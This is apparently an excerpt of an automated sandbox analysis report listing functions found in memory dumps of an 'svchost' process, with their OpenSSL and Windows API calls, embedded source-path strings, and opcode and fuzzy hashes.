                                                                                              Similarity
                                                                                              • API ID: R_new$R_set_debug
                                                                                              • String ID: ssl\statem\extensions_clnt.c$tls_parse_stoc_maxfragmentlen
                                                                                              • API String ID: 476316267-3788999166
                                                                                              • Opcode ID: 7e4d5114516147d18e49989adc8dec87ee4ae1268be9232874c7db3ce5da3604
                                                                                              • Instruction ID: c368f4e47a82bcac8292f908259f17ed13aecb5b2fca0d6e2a52ebbd85f22337
                                                                                              • Opcode Fuzzy Hash: 7e4d5114516147d18e49989adc8dec87ee4ae1268be9232874c7db3ce5da3604
                                                                                              • Instruction Fuzzy Hash: 7E11B2E1A0A68282F7639BB1E8526FD2750EF50740F84C432DE2C437A2DE2CD5DAC710
                                                                                              Function 00007FFBAB41C920 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_new_nullL_sk_pushR_newR_set_debugR_set_error
                                                                                              • String ID: ssl\ssl_cert.c$ssl_cert_add0_chain_cert
                                                                                              • API String ID: 378185551-2634322016
                                                                                              • Opcode ID: 00f0f72a073b363657b12c8ebfdd79dfed386b1c4b339f38e259dc3f9435ebfd
                                                                                              • Instruction ID: 87e9c23a61256ca56aaf60e54e9b8070422fd6d92482dfd505c422836c575749
                                                                                              • Opcode Fuzzy Hash: 00f0f72a073b363657b12c8ebfdd79dfed386b1c4b339f38e259dc3f9435ebfd
                                                                                              • Instruction Fuzzy Hash: D81196B2E1F64285FB529F35E8422BD33A4EF44B80F188436DE6D47BA6DE3CE4458600
                                                                                              Function 00007FFBAB494240 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB49425E
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB494276
                                                                                                • Part of subcall function 00007FFBAB487C10: ERR_vset_error.LIBCRYPTO-3-X64(00000000,00000000,?,00007FFBAB472254), ref: 00007FFBAB487C3F
                                                                                              • EVP_MD_CTX_copy_ex.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB49429F
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB4942A8
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,00007FFBAB48A1CB), ref: 00007FFBAB4942C0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$R_vset_errorX_copy_ex
                                                                                              • String ID: ssl\statem\statem_lib.c$tls13_restore_handshake_digest_for_pha
                                                                                              • API String ID: 3076243290-100768352
                                                                                              • Opcode ID: 44c5da9a5be5b51cd41812c578017f2e6ff4d75699e91a16c019f407d749e792
                                                                                              • Instruction ID: 1042e392715a135cc6b29d32d885e35b76d67a68e1366c3653ada29531a06ab0
                                                                                              • Opcode Fuzzy Hash: 44c5da9a5be5b51cd41812c578017f2e6ff4d75699e91a16c019f407d749e792
                                                                                              • Instruction Fuzzy Hash: 02015EE1F5A14282F763E7B3D8926FD1350AF84784F448432DE2C876B2EE5DA5CA8351
                                                                                              Function 00007FFBAB424900 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 41COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EVP_PKEY_get_security_bits.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB42491C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB42493D
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424955
                                                                                              • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424966
                                                                                              • EVP_PKEY_free.LIBCRYPTO-3-X64(00000000,00007FFBAB418521), ref: 00007FFBAB424983
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debugR_set_errorY_freeY_get_security_bits
                                                                                              • String ID: SSL_CTX_set0_tmp_dh_pkey$ssl\ssl_lib.c
                                                                                              • API String ID: 2486296959-372487106
                                                                                              • Opcode ID: be368217df21468efe549bbf785b2292c2266767b1b91b78b802f847ddedc9c1
                                                                                              • Instruction ID: 382b2cf0b55689654126cc5817c39f67e83c2f0b9d231ac8f7c8eeb3e66b1cbd
                                                                                              • Opcode Fuzzy Hash: be368217df21468efe549bbf785b2292c2266767b1b91b78b802f847ddedc9c1
                                                                                              • Instruction Fuzzy Hash: 9E01B5B2B0998181E752D735F9826FD6360DB947C4F548031EE6C83BB6DE2CD4458700
                                                                                              Function 00007FFBAB4189FE Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_new$L_sk_new_nullL_sk_pushR_set_debug
                                                                                              • String ID: ssl3_ctx_ctrl$ssl\s3_lib.c
                                                                                              • API String ID: 2439357478-173183182
                                                                                              • Opcode ID: 8e858106f05d7818566d941f3b10bfd3f940c0e90e5c8d6d87b27b6a6b9ba9dc
                                                                                              • Instruction ID: 2a205a5819c6b61bb793590dd653fdc073225d3d70127e988eed9fa12ef43d51
                                                                                              • Opcode Fuzzy Hash: 8e858106f05d7818566d941f3b10bfd3f940c0e90e5c8d6d87b27b6a6b9ba9dc
                                                                                              • Instruction Fuzzy Hash: DBF067F0E0F60342FE63A772E4432B96341AF10784F04C436EC2C4A6E6EE2CE8854201
                                                                                              Function 00007FFBAB42E440 Relevance: 12.3, APIs: 8, Instructions: 256COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: O_test_flags$O_get_retry_reasonR_peek_error
                                                                                              • String ID:
                                                                                              • API String ID: 265086535-0
                                                                                              • Opcode ID: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                              • Instruction ID: 0bab99fded017d6f981207ad0769c20e7ab421051aabaab2f86b6bbbed3bc8a6
                                                                                              • Opcode Fuzzy Hash: 17ffcf18ff51bf8dbd1e57d29aca42afad4be13b509c6b8fdcd3179f73af6631
                                                                                              • Instruction Fuzzy Hash: DA9161B1E5E14282FEA68A39E14163D3398EF44B84F588531EE6D877A9DE1CEC819701
                                                                                              Function 64941EA0 Relevance: 12.2, APIs: 8, Instructions: 187synchronizationCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • WaitForMultipleObjects.KERNEL32 ref: 64941EE9
                                                                                              • WaitForSingleObject.KERNEL32 ref: 64941F23
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFBCB73F230,00007FFBCB73FAA0,00000068,?,649421DE,?,?,6494246F), ref: 64941F82
                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,00000070,00007FFBCB73F230,00007FFBCB73FAA0,00000068,?,649421DE,?,?,6494246F), ref: 6494209A
                                                                                              • ResetEvent.KERNEL32 ref: 649420FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: Wait$ObjectSingle$EventMultipleObjectsReset
                                                                                              • String ID:
                                                                                              • API String ID: 654736092-0
                                                                                              • Opcode ID: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                                                                                              • Instruction ID: d3ee0eaab07988580939ca2428ce104d4a652107eb983c9cf61b1eb5acf66ab1
                                                                                              • Opcode Fuzzy Hash: 96c9b5ad3ac0c7c7edf09851d5da80622a09f72e97e6fc1457996ee278957ded
                                                                                              • Instruction Fuzzy Hash: 665114223D440041F7214667E94A3AA0A5FBB577ECF5401A2CF26CA6A1FBBDC5D2C226
                                                                                              Function 00007FFBAB428A70 Relevance: 12.1, APIs: 8, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: L_sk_num$L_sk_findL_sk_valueL_strnlenmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 2509952571-0
                                                                                              • Opcode ID: 03bc5eeada43cb13ffff46621ef564d7c29dbb84ccef4da5ce24b09471ca130c
                                                                                              • Instruction ID: 60e88d51e0f449359601cd073c7e049840cb328ae19f56aa943495c5056010bc
                                                                                              • Opcode Fuzzy Hash: 03bc5eeada43cb13ffff46621ef564d7c29dbb84ccef4da5ce24b09471ca130c
                                                                                              • Instruction Fuzzy Hash: F0419FA2B0F65281EA669A27D94463E6F84EF41BD0F48C435EE2D977A5DF3CE441D300
                                                                                              Function 64942210 Relevance: 12.1, APIs: 8, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 64942170: EnterCriticalSection.KERNEL32(00000120,00000000,00000068,00000000,?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89), ref: 6494219E
                                                                                                • Part of subcall function 64942170: LeaveCriticalSection.KERNEL32(?,?,6494246F,?,?,?,?,?,?,00000000,00000100,64943A89,?,?,?,00000100), ref: 649421B1
                                                                                              • TryEnterCriticalSection.KERNEL32 ref: 64942287
                                                                                              • LeaveCriticalSection.KERNEL32 ref: 649422C3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalSection$EnterLeave
                                                                                              • String ID:
                                                                                              • API String ID: 3168844106-0
                                                                                              • Opcode ID: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                                                                                              • Instruction ID: c70b7dd98fa8b30a946d7bfc7cacc3f56c823bbf88279334903176617df7d1a3
                                                                                              • Opcode Fuzzy Hash: 64a14b26eebd602a32318612d1c73aaa2676a09661875bd3566d3150fd0f9fc1
                                                                                              • Instruction Fuzzy Hash: 17318C2238060486EB149F76E9507DA2365BB86FECF884732CD69973E4DF35C859C351
                                                                                              Function 64946FF0 Relevance: 12.1, APIs: 8, Instructions: 88timethreadCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCurrentThread.KERNEL32 ref: 64947015
                                                                                              • GetThreadTimes.KERNEL32 ref: 64947037
                                                                                              • GetCurrentProcess.KERNEL32 ref: 64947080
                                                                                              • GetProcessTimes.KERNEL32 ref: 649470A2
                                                                                              • _errno.MSVCRT ref: 649470AC
                                                                                              • GetSystemTimeAsFileTime.KERNEL32 ref: 649470CC
                                                                                              • QueryPerformanceFrequency.KERNEL32 ref: 649470F5
                                                                                              • QueryPerformanceCounter.KERNEL32 ref: 64947104
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: CurrentPerformanceProcessQueryThreadTimeTimes$CounterFileFrequencySystem_errno
                                                                                              • String ID:
                                                                                              • API String ID: 3786581644-0
                                                                                              • Opcode ID: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                                                                                              • Instruction ID: 1c768bd9e69684d563be0dbbaa5e68889a0c424e9680141303368067254932ee
                                                                                              • Opcode Fuzzy Hash: 1cbd5dd333b386ab46c507ef65a2726135c869851dae07a2f01727df85f622f6
                                                                                              • Instruction Fuzzy Hash: A2318372755B8883DF09EF61E81036AB366FBD5B88F509126EA9A4B758EF3DC014C740
                                                                                              Function 00007FFBAB495080 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4951A7
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB4951BF
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB495242
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00000000,-00000031,?,00007FFBAB488676), ref: 00007FFBAB49525A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\statem_lib.c$tls_get_message_header
                                                                                              • API String ID: 193678381-1127185309
                                                                                              • Opcode ID: 8f0f2f9a1f104ec38d508048ab7801bae8aebf32c6308166d000d658e4fcaa8e
                                                                                              • Instruction ID: f1ee16a66b92000932e657ecf5a4128b8cca4dabe9d6799109b758dae4b55e78
                                                                                              • Opcode Fuzzy Hash: 8f0f2f9a1f104ec38d508048ab7801bae8aebf32c6308166d000d658e4fcaa8e
                                                                                              • Instruction Fuzzy Hash: 50616CB2A0978286EB62CF75E4903BD37A0FB44B48F188036DFAD47665DF38E4518B11
                                                                                              Function 649415C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 126COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              • Assertion failed: (%s), file %s, line %d, xrefs: 64941628
                                                                                              • ../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c, xrefs: 64941616
                                                                                              • (((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0), xrefs: 64941621
                                                                                              • &, xrefs: 6494160E
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2845005161.0000000064941000.00000020.00000001.01000000.0000000E.sdmp, Offset: 64940000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2844972741.0000000064940000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845071231.000000006494A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845106580.000000006494E000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845149388.0000000064950000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2845182355.0000000064953000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_64940000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: __iob_func
                                                                                              • String ID: &$(((barrier_t *)*barrier)->valid == LIFE_BARRIER) && (((barrier_t *)*barrier)->busy > 0)$../../src/mingw-w64/mingw-w64-libraries/winpthreads/src/barrier.c$Assertion failed: (%s), file %s, line %d
                                                                                              • API String ID: 686374508-3470151808
                                                                                              • Opcode ID: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                                                                                              • Instruction ID: a6c690fc7c4ad125f6452d29da4510a78f9609d2262ab1e3dfa78bf125776778
                                                                                              • Opcode Fuzzy Hash: 06c8006b2e40a1b02f2937bba9d3daa3392596c9965291c53121d202f0f451b8
                                                                                              • Instruction Fuzzy Hash: FD41D13339160586EB20DB36E91436E6765E792BECF884121DE1E47764DF38C892C700
                                                                                              Function 00007FFBAB482490 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482551
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482569
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB4825EE
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,00007FFBAB47CB02,?,00007FFBAB4350C9), ref: 00007FFBAB482606
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: custom_ext_parse$ssl\statem\extensions_cust.c
                                                                                              • API String ID: 193678381-3931677214
                                                                                              • Opcode ID: 594981efdf0b0bc1dd16da0d9763bae2fcac2d566868208271724ffb70fb5ae8
                                                                                              • Instruction ID: ff6226efcd7288f0ceefbbb4d94d6d500799e98e1ff2165a90e4b1c10cf9ed1e
                                                                                              • Opcode Fuzzy Hash: 594981efdf0b0bc1dd16da0d9763bae2fcac2d566868208271724ffb70fb5ae8
                                                                                              • Instruction Fuzzy Hash: 6041A3B2A0E68282E7629B75E5507BE6390FB94B84F54C031EE5D83BB5DE3CD845CB00
                                                                                              Function 00007FFBAB484420 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 91COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug
                                                                                              • String ID: ssl\statem\extensions_srvr.c$tls_construct_stoc_status_request
                                                                                              • API String ID: 193678381-1174127863
                                                                                              • Opcode ID: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                              • Instruction ID: 3e6bc3f9503f9dcda9149e09f30947a445ea6e2b641e9f60b8c7e5c4e484389e
                                                                                              • Opcode Fuzzy Hash: 69967520ab07d786b5007b022920560fe12736c1b069c0e31d578238edd2043d
                                                                                              • Instruction Fuzzy Hash: E33172A1F1A55242FBA29776E5957BD2350AB44BC4F548032EF2C87AF6DF2CE8858700
                                                                                              Function 00007FFBAB478A30 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 88COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00007FFBAB411740: CRYPTO_zalloc.LIBCRYPTO-3-X64 ref: 00007FFBAB4120F6
                                                                                                • Part of subcall function 00007FFBAB411740: CRYPTO_free.LIBCRYPTO-3-X64 ref: 00007FFBAB412138
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B14
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B2C
                                                                                              • ERR_new.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B4A
                                                                                              • ERR_set_debug.LIBCRYPTO-3-X64(?,?,?,?,00000000,00007FFBAB4756B4), ref: 00007FFBAB478B62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000001A.00000002.2848364720.00007FFBAB411000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFBAB410000, based on PE: true
                                                                                              • Associated: 0000001A.00000002.2848344421.00007FFBAB410000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848455209.00007FFBAB4A0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848516112.00007FFBAB4CD000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                              • Associated: 0000001A.00000002.2848538462.00007FFBAB4D1000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_26_2_7ffbab410000_svchost.jbxd
                                                                                              Similarity
                                                                                              • API ID: R_newR_set_debug$O_freeO_zalloc
                                                                                              • String ID: ssl\record\methods\tls_common.c$tls_initialise_write_packets_default
                                                                                              • API String ID: 2822291608-433091719
                                                                                              • Opcode ID: c208c9c7c89a00b8ead086420fa9b379340a8a7e8dee45128d96744d93d39b55
                                                                                              • Instruction ID: 410063d27f4d858c406a6a6651b45ec64f129feb5b361b582bbb4b67e5d43708
                                                                                              • Opcode Fuzzy Hash: c208c9c7c89a00b8ead086420fa9b379340a8a7e8dee45128d96744d93d39b55
                                                                                              • Instruction Fuzzy Hash: 5131C1B2B0968286E752DB36E8417BA6751FF447C4F448032EE6D43BA6EE3CE195C740
